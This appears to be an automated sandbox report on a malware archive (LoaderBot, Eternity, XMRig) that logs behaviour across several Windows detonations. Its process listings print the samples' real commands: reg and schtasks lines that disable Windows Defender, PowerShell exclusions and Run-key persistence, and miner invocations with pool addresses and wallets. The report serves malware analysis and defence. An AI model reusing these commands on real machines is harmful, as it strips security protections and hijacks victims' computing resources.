Analysis Overview
SHA256
9ea9441f7c4279b04044795c514dab27c1a7129dc744044207cdd4dba0859dc9
Threat Level: Known bad
The file 7858706412.zip was found to be: Known bad.
Malicious Activity Summary
LoaderBot executable
xmrig
Loaderbot family
Modifies security service
Eternity family
LoaderBot
Modifies Windows Defender Real-time Protection settings
Eternity
LoaderBot executable
XMRig Miner payload
Sets file to hidden
Executes dropped EXE
UPX packed file
Checks computer location settings
Drops startup file
Loads dropped DLL
Deletes itself
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Runs ping.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: RenamesItself
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Views/modifies file attributes
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-07 13:02
Signatures
Eternity family
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Loaderbot family
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220812-en
Max time kernel
99s
Max time network
140s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4636 set thread context of 5052 | N/A | C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe | C:\Windows\System32\svchost.exe |
| PID 1292 set thread context of 2624 | N/A | C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe | C:\Windows\System32\svchost.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe
"C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn OneDrive /rl HIGHEST /tr C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
Network
| Country | Destination | Domain | Proto |
| RU | 31.41.244.231:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| DE | 20.52.64.200:443 | | tcp |
| RU | 31.41.244.231:80 | | tcp |
Files
memory/2012-132-0x0000000000000000-mapping.dmp
memory/4636-133-0x0000000000DF0000-0x000000000143F000-memory.dmp
memory/5052-135-0x00007FF63A32C6E0-mapping.dmp
memory/5052-134-0x00007FF63A2D0000-0x00007FF63A46F000-memory.dmp
memory/5052-140-0x00007FF63A2D0000-0x00007FF63A46F000-memory.dmp
memory/5052-145-0x00007FF63A2D0000-0x00007FF63A46F000-memory.dmp
memory/4636-146-0x0000000000DF0000-0x000000000143F000-memory.dmp
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/4292-149-0x0000000000FE0000-0x000000000162F000-memory.dmp
memory/4636-150-0x0000000000DF0000-0x000000000143F000-memory.dmp
memory/1292-152-0x0000000000FE0000-0x000000000162F000-memory.dmp
memory/2624-154-0x00007FF63A32C6E0-mapping.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
152s
Max time network
141s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Security Update\\WinSec.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1892 set thread context of 1708 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Set-MpPreference -PUAProtection 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath C:\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update' -Value '"C:\Users\Admin\AppData\Local\Temp\Windows Security Update\WinSec.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 4774bMmQt7g8FfWNP1K51Tdy7v5DS2ZRYarJcEmpy8rAXnuycfKGerFdEawGvgHUnCePRxky732gfcowXbXHcwT69rhLT5w.rig16
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
Files
memory/900-54-0x000007FEFC3B1000-0x000007FEFC3B3000-memory.dmp
\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
| MD5 | a419d5d9882f43143818df7122c684a1 |
| SHA1 | 63a5ae4680d40c7c87d3b5b96317a8afbf42d071 |
| SHA256 | 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7 |
| SHA512 | 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a |
memory/1892-56-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
| MD5 | a419d5d9882f43143818df7122c684a1 |
| SHA1 | 63a5ae4680d40c7c87d3b5b96317a8afbf42d071 |
| SHA256 | 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7 |
| SHA512 | 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a |
memory/1892-59-0x0000000001380000-0x000000000192E000-memory.dmp
memory/1472-60-0x0000000000000000-mapping.dmp
memory/612-62-0x0000000000000000-mapping.dmp
memory/1384-61-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | ac590245904e4b02a2a0f76fee439591 |
| SHA1 | e89492ba719a7d0b55d1777d103c98a6050eb571 |
| SHA256 | f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19 |
| SHA512 | 76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863 |
memory/2008-71-0x0000000000000000-mapping.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
148s
Command Line
Signatures
LoaderBot
xmrig
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe" | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4768 wrote to memory of 1796 | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
| PID 4768 wrote to memory of 1796 | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
| PID 4768 wrote to memory of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
| PID 4768 wrote to memory of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe
"C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe"
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 1796 -ip 1796
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1796 -s 760
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
Network
| Country | Destination | Domain | Proto |
| US | 52.109.13.62:443 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 8.238.21.126:80 | | tcp |
| US | 20.42.65.90:443 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
Files
memory/4768-132-0x0000000000700000-0x0000000000AFE000-memory.dmp
memory/4768-133-0x0000000005740000-0x00000000057A6000-memory.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1796-134-0x0000000000000000-mapping.dmp
memory/1796-137-0x00000000001D0000-0x00000000001E4000-memory.dmp
memory/1796-138-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1796-139-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1232-140-0x0000000000000000-mapping.dmp
memory/1232-143-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1232-144-0x00000000005D0000-0x00000000005F0000-memory.dmp
memory/1232-145-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1232-146-0x00000000020B0000-0x00000000020D0000-memory.dmp
memory/1232-147-0x00000000020B0000-0x00000000020D0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220901-en
Max time kernel
129s
Max time network
155s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\7za.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Warn = "MSHTA VbScript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run CreateObject(\"\"Wscript.Shell\"\").RegRead(\"\"HKCU\\v1Elm0D\"\"), 0, False:close\")" | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Windows\System32\WScript.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\89.0.4389.114\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: 35 | N/A | C:\Perform\7za.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: 18446744065119617044 | N/A | C:\Perform\Resources\NSudo.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B088.tmp\B099.tmp\B09A.bat C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
